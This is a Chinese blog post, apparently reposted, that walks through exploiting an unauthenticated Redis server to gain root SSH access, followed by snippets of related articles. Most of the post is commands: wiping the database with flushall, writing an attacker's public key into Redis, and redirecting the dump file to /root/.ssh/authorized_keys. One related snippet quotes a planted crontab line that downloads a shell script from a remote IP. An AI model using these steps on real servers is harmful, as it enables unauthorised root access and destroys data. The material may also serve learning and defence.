Redis 未授权漏洞利用实践

最新推荐文章于 2022-02-04 13:12:14 发布
最新推荐文章于 2022-02-04 13:12:14 发布
阅读量136 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 运维 python
原文链接:https://my.oschina.net/fengjihu/blog/749944
本文介绍了一种使用Redis服务器来实现两台服务器间免密钥SSH登录的方法。通过生成密钥对,并将公钥存入Redis,再利用Redis的数据持久化特性将公钥写入目标服务器的authorized_keys文件,最终实现从一台服务器免密登录另一台服务器。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

服务器准备

2台服务器

192.168.63.202 安装redis 默认端口6379 root启动redis

192.168.63.203 模拟入侵端

1、在192.168.63.203(入侵端)上生成key

输入命令:ssh-keygen,然后一路回车,在当前用户的家目录下的.ssh目录中会生成一对密钥对:id_rsa id_rsa.pub

这里我们要把公钥(id_rsa.pub)通过redis放到192.168.63.202上,从而起到免密钥登陆的效果。

#cat /root/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyYw4Ygqz8Bbz7Qr1sZojGjIefFzUGWQAJfX/EzhVWjSjH6HNEE3PdQXjW6esDYPcShS2eojsMuvsrCuDD7yXzHIsSsJMyAm8K7BJFyMJCsnjhzUto14snVKGhhxjrdkwfKhLMqOWA8iaUSHpIk+Aiwtdck5NSnSRg40VWYTPK/wYUoPI6fmGQ0t+9vZV1rF4eKaeR3l9EMNU+W8z5shJhVN8TMuOEcV9/ooJ2AlCKftBKc4WLgFa/FiwtTlQdxX+UFOyq3C76LqA9DDI3tY8RwCG2I89xeyzi2QwdrxYHwLBHBbaU4bmpDYMMPI6hdwlWCz8h7b7k3eycBgjisig2w== root@CentOS6.5-2

上面是我测试机生成的密钥

2、测试redis是否可以连接上

telnet 192.168.63.202 6379

redis-cli -h 192.168.63.202

3、清理redis数据库

redis-cli -h 192.168.63.202 flushall

4、处理192.168.63.203的公钥

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

为什么要这么操作?

传到192.168.63.202上的未处理过的公钥(公钥前后会加字符串,到时公钥错误)

REDIS0006redisAssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyYw4Ygqz8Bbz7Qr1sZojGjIefFzUGWQAJfX/EzhVWjSjH6HNEE3PdQXjW6esDYPcShS2eojsMuvsrCuDD7yXzHIsSsJMyAm8K7BJFyMJCsnjhzUto14snVKGhhxjrdkwfKhLMqOWA8iaUSHpIk+Aiwtdck5NSnSRg40VWYTPK/wYUoPI6fmGQ0t+9vZV1rF4eKaeR3l9EMNU+W8z5shJhVN8TMuOEcV9/ooJ2AlCKftBKc4WLgFa/FiwtTlQdxX+UFOyq3C76LqA9DDI3tY8RwCG2I89xeyzi2QwdrxYHwLBHBbaU4bmpDYMMPI6hdwlWCz8h7b7k3eycBgjisig2w== root@CentOS6.5-2

EBN7=

传到192.168.63.202上的处理过的公钥(在公钥前后都增加2个换行,这样公钥就处在了单独的一行,ssh就可以正常识别了。)

REDIS0006redisA

 

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyYw4Ygqz8Bbz7Qr1sZojGjIefFzUGWQAJfX/EzhVWjSjH6HNEE3PdQXjW6esDYPcShS2eojsMuvsrCuDD7yXzHIsSsJMyAm8K7BJFyMJCsnjhzUto14snVKGhhxjrdkwfKhLMqOWA8iaUSHpIk+Aiwtdck5NSnSRg40VWYTPK/wYUoPI6fmGQ0t+9vZV1rF4eKaeR3l9EMNU+W8z5shJhVN8TMuOEcV9/ooJ2AlCKftBKc4WLgFa/FiwtTlQdxX+UFOyq3C76LqA9DDI3tY8RwCG2I89xeyzi2QwdrxYHwLBHBbaU4bmpDYMMPI6hdwlWCz8h7b7k3eycBgjisig2w== root@CentOS6.5-2

 

ZP

5、向redis写公钥

#cat key.txt | redis-cli -h 192.168.63.202 -x set redis

正常的话会反馈OK

6、利用redis把公钥写入到文件(authorized_keys)

连接redis

# redis-cli -h 192.168.63.202

查看keys

192.168.63.202:6379> keys *
1) "redis"

#写入配置库的路径及存放位置

192.168.63.202:6379> CONFIG SET dir /root/.ssh/

OK

#写入配置库名称及存放名称

192.168.63.202:6379> CONFIG SET dbfilename "authorized_keys"

OK

#写入

192.168.63.202:6379> save

OK

#退出

192.168.63.202:6379> exit

7、测试登陆192.168.63.202(redis服务器)

ssh root@192.168.63.202

 

转载于:https://my.oschina.net/fengjihu/blog/749944

Redis未授权漏洞总结
weixin_39664643的博客
01-21 2539
Redis未授权漏洞总结 0x00 Redis介绍 Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库,其具备如下特性: 基于内存运行,性能高效 支持分布式,理论上可以无限扩展 key-value存储系统 开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API 目前guthub/twitter/微博/阿里/美团/百
Windows server系统加固:数据库检查redis未授权排查
君逍遥o
07-03 784
在Windows Server系统中加固数据库并检查Redis未授权访问漏洞,需要遵循一系列的安全步骤和最佳实践
安装redis后,系统异常,被黑客攻击入侵
BecauseOfYouIKnew的博客
03-22 2823
如果你的系统在安装redis后,同时在使用默认redis配置文件的情况下,系统发生异常,那你就应该去查看你的/root/.ssh/authorized_keys的文件,如果出现类似代码:说明你的系统被黑客通过redis入侵了,`REDIS0006þ^@^@^GcrackitA<90>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDao4L1Hk/El05qbO5NeBA
入侵事件
为了忘却的专栏
11-15 1447
1、/etc/crontab文件被修改: REDIS0006þ^@^@^Gcrackit@T SHELL=/bin/sh #* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh ÿÉ6GþÊN 2、shell.sh文件: rm -rf shell.sh wget
Redis实现系列】持久化AOF实现
菜鸡也有大佬梦
11-12 220
AOF 除了RDB持久化功能之外,Redis还提供了AOF(Append Only File)持久化功能。 被写入AOF文件的所有命令都是以Redis的命令请求协议格式保存的,因为Redis的命令请求协议是纯文本格式。 示例 redis> SET msg "hello" OK redis> SADD fruits "apple" "banana" "cherry" (integer) 3 redis> RPUSH numbers 128 256 512 (integer) 3
Redis源码解析:11RDB持久化
weixin_30446613的博客
03-19 243
Redis的RDB持久化的相关功能主要是在src/rdb.c中实现的。RDB文件是具有一定编码格式的数据文件,因此src/rdb.c中大部分代码都是处理数据格式的问题。 一:RDB文件格式 上图就是一个完整RDB文件的格式。 RDB文件的最开头是REDIS部分,这个部分的长度为5字节,保存着"REDIS"五个字符。通过...
Redis-第10章 RDB持久化
guolong1983811的专栏
01-23 1843
第10章 RDB持久化 Redis是一个键值对数据库服务器,服务器中通常包含着任意个非空数据库,而每个非空数据库中又可以包含任意个键值对,为了方便起见,我们将服务器中的非空数据库以及它们的键值对统称为数据库状态。 举个例子,图10-1展示了一个包含三个非空数据库Redis服务器,这三个数据库以及数据库中的键值对就是该服务器的数据库状态。 图10-1 数据库状态示例 因为Redis是内
redis未授权访问漏洞提权
最新发布
01-11
### Redis未授权访问漏洞的提权方法 对于Redis未授权访问漏洞,攻击者可以通过连接到开放端口并执行命令来获取服务器控制权限。如果Redis实例配置不当,允许远程客户端无需身份验证即可访问,则存在潜在的安全风险...
Redis未授权访问与SSH key利用分析
本文主要讨论了Redis未授权访问配合SSH key文件利用的安全风险,讲述了Redis的默认设置如何可能导致服务暴露,以及攻击者如何利用这种漏洞在目标服务器上写入公钥,进而通过SSH私钥非法登录。 Redis是一个广泛使用...
Redis】来看看Redis浅显易懂的RDB持久化原理
浩瀚宇宙的一粒尘埃
07-10 686
文章目录RDB持久化1.持久化背景2.RDB简介2.1.创建方式2.1.1.自动创建2.2.2.手动创建2.2.载入方式3.RDB实现3.1.设置触发条件3.2.记录变更数3.3.判断是否满足触发条件4.RDB文件4.1.整体结构4.2.databases部分4.3.key_value_pairs部分4.4.value部分4.4.1.字符串对象4.4.2.列表对象4.4.3.集合对象4.4.4.有序集合对象4.4.5.Hash对象4.4.6.INTSET4.4.7.ZIPLIST RDB持久化 1.持久化背
CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录
Dancen的专栏
07-18 3749
事件经过: 周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。 情况紧急,登录时发现该应用服务器并没有崩溃。 执行: ps -ef | grep nginx 结果显示相关服务还健在。 执行: uptime 发现,服务器的负载非常高。 执行: top 发现,有一个叫做minerd的进程占用了几乎所有cpu资源。 百度“centos minerd”,搜索结果显
ERROR: ld.so: object '/usr/local/lib/libftp.so' from /etc/ld.so.preload cannot be preloaded: ignored
hh_hh1816的博客
05-01 1万+
记一次问题的排查史-2020-5-1 第一次写blog,排版略显粗糙,文章有引用博友的链接,望海涵 问题由来: 分析: 执行vim /etc/ld.so.preload可发现该文件中打印如下语句: /usr/local/lib/libftp.so 结合报错信息:ERROR: ld.so: object '/usr/local/lib/libftp.so' from /etc/ld....
redis学习笔记之持久化
ah6869的博客
02-07 189
redis是一个支持持久化的内存数据库,也就是说redis需要经常将内存中的数据同步到磁盘来保证持久化。redis支持两种持久化方式,一种是 Snapshotting(快照)也是默认方式,另一种是Append-only file(缩写aof)的方式。下面分别介绍Snapshotting 快照是默认的持久化方式。这种方式是就是将内存中数据以快照的方式写入到二进...
Redis6-基本使用
liming0025的专栏
02-04 1575
一、官网查阅和基本配置 1、redis官网 Redis。官网 2、命令大全 Redis 命令参考 — Redis 命令参考 3、redis6的版本 需要使用大于6.0.8,redis-server -v 二、redis的单线程和多线程 1、redis为什么选择单线程 redis各个版本之间架构都不同,所以这个问题需要从不同版本去描述 3.x,单纯的单线程 数据结构简单 避免锁和线程切换的开销 基于内存 多路复用和非阻塞IO:redis使用IO多路复用功能来监听多个soc
redis主从同步原理
未来可7
08-30 6120
1. 概述整体过程概述如下: 1. 初始化配置好主从后,无论slave是初次还是重新连接到master, slave都会发送PSYNC命令到master。 如果是重新连接,且满足增量同步的条件(3.1中详述),那么redis会将内存缓存队列中的命令发给slave, 完成增量同步(Partial resynchronization)。否则进行全量同步。 正常同步开始 任何对master的写操作都会
Redis命令介绍之列表的操作命令(第一部分)
Ghosind
07-04 676
介绍并以示例的形式展示Redis中列表相关命令(第一部分),包括LPUSH、LPOP、LLEN、LRANGE、LINDEX等命令。
[ Redis ] Redis 未授权访问漏洞利用,服务器登陆不上
awueu25069的博客
04-14 158
一、缘由:   突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑。在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中的账户都被删除,且第一行加上了REDIS0006,还有莫名其妙的账户加入,google之后确认redis漏洞利用,服务器被攻破。 二、解决办法:     最好有一个漏扫工具...
Redis未授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值